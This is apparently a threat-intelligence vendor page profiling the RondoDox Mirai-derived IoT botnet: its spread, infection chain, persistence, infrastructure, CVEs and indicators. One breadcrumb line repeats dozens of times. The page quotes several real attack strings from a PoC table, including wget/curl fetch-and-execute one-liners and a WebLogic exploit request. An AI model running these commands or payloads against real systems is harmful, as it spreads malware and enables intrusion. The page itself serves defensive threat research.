RondoDox is a Linux-focused botnet and Mirai-derived malware family first observed in 2025 that targets internet-exposed IoT devices, routers, DVRs, network appliances, web applications, and other vulnerable systems. It is primarily associated with distributed denial-of-service operations, but reporting also links it to cryptocurrency mining through deployment of XMRig and to the delivery of additional malware components. The malware has been described as a Mirai variant or Mirai-like botnet, while differing in its strong emphasis on denial-of-service activity and broad exploit-driven propagation.
RondoDox spreads through large-scale opportunistic exploitation of remote code execution and command injection vulnerabilities across a wide range of embedded and enterprise-facing products. Researchers have associated it with exploitation of well over one hundred vulnerabilities, including both long-known flaws and newly disclosed issues, indicating rapid weaponization of public vulnerability research. Campaigns attributed to RondoDox have targeted Linux-based systems extensively, especially end-of-life consumer routers and other poorly maintained edge devices, but also internet-facing enterprise software and infrastructure.
Observed infection chains commonly use fileless shell one-liners that fetch and execute a first-stage script, which then identifies a writable location, removes competing malware, disables or weakens local defenses, selects an architecture-appropriate payload, and launches the main bot binary. The malware ecosystem supports numerous CPU architectures, reflecting its focus on heterogeneous IoT and embedded environments. The first-stage logic has been reported to kill suspicious or rival processes, clear traces, test writable directories, and prepare persistence before executing the main payload.
Post-compromise behavior includes connecting infected devices to command-and-control infrastructure, establishing persistence, and preparing the host for botnet operations. RondoDox has been observed removing competing infections and modifying startup mechanisms to survive reboots. Main binaries reportedly include anti-analysis and anti-debugging checks. Infrastructure used by the operators has included both conventional hosting and likely compromised residential systems, with some hosting nodes employing blacklist-based decoy behavior to hinder analysis.
Operationally, RondoDox has been linked to sustained high-volume exploitation campaigns reaching thousands of attempts per day. Researchers documented an initial shotgun-style exploitation model using many vulnerabilities in parallel, followed by a later shift toward a narrower set of newer or higher-value flaws. The botnet has been tied to attacks against government, financial, industrial, and general internet-exposed targets, with a particularly strong emphasis on consumer and small-office edge devices. Some reporting links portions of its infrastructure to Iranian-hosted networks, but firm attribution to a specific state actor is not established.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
50 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
20 distinct techniques documented for this family, organized by ATT&CK tactic.
The content is a large CVE PoC table showing repeated HTTP/SOAP/XML requests exploiting internet-exposed services and devices, e.g. "CVE-2017-10271 POST /wls-wsat/CoordinatorPortType ... <string>(wget -qO- http://<REDACTED_IP>/rondo.xcw.sh||busybox wget -qO- http://<REDACTED_IP>/rondo.xcw.sh||curl -s http://<REDACTED_IP>/rondo.xcw.sh)|sh</string>" and many similar requests across routers, DVRs, web apps, and middleware.
At this point it will also set up its own persistence and drop and launch the XMRig miner
Many payloads invoke shell execution, e.g. "|sh", "/bin/bash -c \"wget -qO- http://<REDACTED_IP>/rondo.bash.sh|sh&\"", "require('child_process').exec(...)", and "java.lang.Runtime.getRuntime().exec(...)".
"RondoDox malware encodes its configuration data using a simple XOR obfuscation algorithm... decrypted using the hexadecimal key 0x21"
The table shows varied User-Agent strings and email-like identifiers such as "Mozilla/5.0 (bang2012@tutanota.de)", "Mozilla/5.0 (bang2012@protonmail.com)", and browser-like Chrome user agents.
It then attempts to remove other threats, both by checking specific file locations and by removing entries from the victim's crontabs.
The payloads repeatedly rely on native utilities such as "wget", "busybox wget", "curl", and shell interpreters already present on the target device.
Upon being launched, the main binary does some basic sanity checks for its name and arguments, as well as checks for anti-debug and anti-analysis.
This isn’t hypothetical — it’s the entire history of IoT botnets, from Mirai in 2016 through the Aisuru and RondoDox campaigns still running in 2025–2026, which scan the internet for devices with default passwords and enroll them automatically.
Likely usage of compromised residential IPs as hosting infrastructure
Repeated command strings download payloads from attacker infrastructure, e.g. "wget -qO- http://<REDACTED_IP>/rondo.rwx.sh|sh", "curl -s http://<REDACTED_IP>/rondo.whm.sh|sh", and "wget -O rondo http://<REDACTED_IP>/rondo.mips;chmod 777 rondo;./rondo netgear.mips;echo".
186 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
77 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A sophisticated botnet observed targeting both enterprise and consumer systems, using staged infrastructure shifts, fileless payloads, broad header-based exploit delivery, and compromised residential routers for scanning and propagation.
IoT botnet campaign active in 2025–2026 that scans the internet for devices with default passwords and enrolls them automatically.
A botnet that exploits vulnerabilities in internet-facing devices, particularly Linux-based systems and older ASUS routers, to conduct denial-of-service attacks.
A Mirai-like botnet hosted on Iranian infrastructure that conducted large-scale exploitation attempts against internet-exposed devices.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.